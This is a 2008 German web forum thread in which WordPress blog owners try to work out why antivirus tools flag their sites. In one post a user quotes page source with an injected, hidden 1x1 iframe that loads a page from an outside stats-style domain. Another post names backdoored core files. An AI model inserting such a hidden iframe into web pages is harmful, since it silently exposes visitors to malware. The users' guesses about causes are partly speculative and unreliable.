Trojaner-Warnung auf meinen Wordpress-Blogs - Seite 2

schorsch · 23.01.2008, 08:13

Zitat:

Zitat von Putzlowitsch

Dieses IFrame mit dem Zähler (?) ist immer noch drin, und zwar im Beitrag "Winterfest mit Ausrufung der Fischerkönige". Da wird mit Javascript irgendwelcher Code zusammengebastelt. Sowas ist immer verdächtig, springen Virenscanner bestimmt gerne drauf an. Ist ja möglicherweise wirklich ein Trojaner.

Gruß
Ingo

Danke Putzlowitsch! Ein Blick in den Quellcode bestätigt Deinen Hinweis:

Zitat:

<div class="post" id="post-165">
<h2><a href="http://fv-bakum.de/?p=165" rel="bookmark" title="Permanent Link to Winterfest mit Ausrufung der Fischerkönige">Winterfest mit Ausrufung der Fischerkönige</a></h2>
<small>18. November 2007 </small>

<div class="entry">
<p> Am 17. November fand das Winterfest des Fischereivereins der Gemeinde Bakum e.V. statt. Es Abschluss und Höhepunkt des Jahres 2007 zugleich.</p>
<div class="myinlinepictureleft" style="width:150px">
<div class="myinlineborder" style="width:150px"><img class="myinlinepictureimg" src="http://fv-bakum.de/wp-content/myfotos/winterfest1//tumbs/tmb_DSC_0050.jpg" alt="" title="" width="150" height="99" /></div>
</div>
<p>Zahlreiche Mitglieder und Freunde des Vereins waren zum Winterfest in das Vereinslokal Tiemerding in Hausstette gekommen. Nach der Begrüßung durch den zweiten Vorsitzenden Bernard Koldehoff gab es ein deftiges und leckeres Kohlessen. Danach wurden die Fischerkönige ausgerufen. Björn Gerken ist Fischerkönig am Mäuseturmsee in Harme, Günter Osterloh am Vereinsteich in Carum. <a href="http://fv-bakum.de/?page_id=161">Zu den Fotos …</a></p>
<p>Oliver Peschke wurde für 30 Jahre Mitgliedschaft im Fischereiverein, Werner Klomfass für 25 Jahre Mitgliedschaft geehrt. Eine große Tombola mit zahlreichen attraktiven Gewinnen stand danach auf dem Programm. Mit Dj Ferdi gab es eine große Polonaise durch den Saal <iframe src="http://www.wp-stats-php.info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>  und noch lange wurde getanzt und gefeiert.</p>
</div>

Ich habe daraufhin diesen Beitrag gelöscht. Wie kann es sein, das dieser Code in diesen Beitrag kam? Wie kann man dies verhindern?

schorsch · 23.01.2008, 09:55

Zitat:

Zitat von Putzlowitsch

Dieses IFrame mit dem Zähler (?) ist immer noch drin, und zwar im Beitrag "Winterfest mit Ausrufung der Fischerkönige". Da wird mit Javascript irgendwelcher Code zusammengebastelt. Sowas ist immer verdächtig, springen Virenscanner bestimmt gerne drauf an. Ist ja möglicherweise wirklich ein Trojaner.

Gruß
Ingo

Danke Ingo, dass ist schon mal die Ursache:

Ein böser Code wurde einfach in meinen Beiträgen eingeschleust, der auf eine wp-stats-info …. Seite verwies, von der anscheinend dieser Trojaner seinen Weg in fremde Rechner sucht. Ein einfacher Rechtsklick mit der Maus “Seitenquelltext anzeigen” reichte aus, diesen Code in den Beiträgen sofort zu entdecken. Selbstverständlich habe ich die “infizierten” Beiträge sofort entfernt. Bei einem Update der Wordpres-Installation werden die Beiträge nicht geändert. Deshalb konnte der schädliche Code beim Auswechseln der Wordpress-Dateien auch nicht beseitigt werden.
Nur was soll man jetzt noch machen? Wie kömmt dieser böse Quelltext in mein Blog? Wie kann man verhindern, das dieser Code sich so einfach in ein Wordpress-Blog schleichen kann? Ich habe alle Dateien der Installation getauscht, meinen Rechner mit dem Antivirenprogramm Antivir gescannt. Nun weiß ich auch nicht, was ich sonst noch so tun kann.

Ich habe in meinem Blogartikel Boeser Code im Wordpress-Blog « Schorschs World dieses Problem ebenfalls zur Diskussion gestellt, da dies sicher auch andere betrifft.
Danke für Eure weiteren Tipps und Unterstützung,
Schorsch

Alphawolf · 23.01.2008, 11:54

Ich hatte kürzlich eine ähnliche Attacke. In meinem Blog-Footer wurden Links zu Sex- und Paris Hil**n-Seiten gesetzt, die aber in einem DIV standen, der versteckt war. Man konnte sie also nicht sehen (bzw. nur im Quelltext). Ursache war, dass jemand den Hook wp_footer nutzte, um das in den Footer zu schreiben, denn in der Theme-footer.php war nichts dergleichen.

Der Code wurde in der /wp-includes/default_filters.php eingetragen, sodass die Links auttomatisch geschrieben wurden: Fixes wordpress.net.in Spam footer Injection Infected by Goro class-mail.php and default-filters.php backdoor » By Avice De'vereux » WordPress, injection, vulnerability Bei mir war's nur Punkt 4, der zutraf.

schorsch · 23.01.2008, 17:29

Zitat:

... ). Ursache war, dass jemand den Hook wp_footer nutzte, um das in den Footer zu schreiben, denn in der Theme-footer.php war nichts dergleichen.

Schön, wer ist der "Jemand", und wie hast Du dieses Problem gelöst? Was ist das für Normalsterbliche, ein "Hook"? Wo war die Sicherheitslücke? Wie konnten die Dateien von außen verändert werden?

Arno Simon · 23.01.2008, 19:12

steht alles in oben (von alphawolf) gepostetem Link bzw. den darin enthaltenen weiterführenden Links.

vG

Arno

Alphawolf · 24.01.2008, 10:15

Das gibt's doch nicht.

Jetzt hab ich gerade nochmal geschaut und der Eintrag in /wp-includes/default_filters.php schon wieder drin. Jetzt habe ich auch die class_mail.php gelöscht, mal sehen ob er heute Nacht wieder schreibt..

schorsch · 05.02.2008, 08:12

Ich hatte in den letzten Tagen weitere merkwürdige "Zusatzeinträge" in unserem Feuerwehrblog: in einem Eintrag wurde Text in spanischer Sprache hinzugefügt. Heute morgen wurde ich über einen Kommentar iper Email nformiert und fand in meinem Blog einen angeblichen Google - Link zu Handy - Rufmelodien. Ich nehme an, dass über diese Lücke der unerwünschte Text und Quellcode ins Blog kommen kann. Daher werde ich erstmal alle Kommentar- und Trackbackfunktionen deaktivieren. Ist eigentlich ja schade. Ein Stück Wordpress-Funktion wird zerstört durch derartige Sicherheitslücken ...

Monika · 05.02.2008, 08:48

ich würd mal sagen dein server ist offen wie ein Scheunentor ...

SusanneK. · 04.05.2008, 11:29

@schorsch,

weißt du mittlerweile, wie die auf deinen Server gekommen sind?

Andreas_S · 15.05.2008, 14:50

Ich habe auch gerade telefonisch erfahren, dass bei einem Zugriff auf mein Blog der Kaspersky-Virenscanner "geschrien" hat.
Zu rekonstruieren war das telefonisch nicht.
Aber nach der Lektüre dieses Threads hier glaube ich zu wissen, woran es liegen könnte, dass Kaspersky "schreit": Amazon-Buchanzeigen könnten es sein wie der folgdende Code zeigt:

Code:

<iframe src="http://rcm-de.amazon.de/e/cm?t=37sechsblog-21&o=3&p=8&l=as1&asins=3766332341&fc1=000000&IS2=1&lt1=_blank&lc1=0000ff&bc1=000000&bg1=ffffff&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" marginbuttom="30" align="left" frameborder="0"></iframe>

Kommende Woche bin ich ohnehin bei dem Anrufer zu Besuch und werde das mal testen. Und dann werde ich es Euch wissen lassen.

Grüße!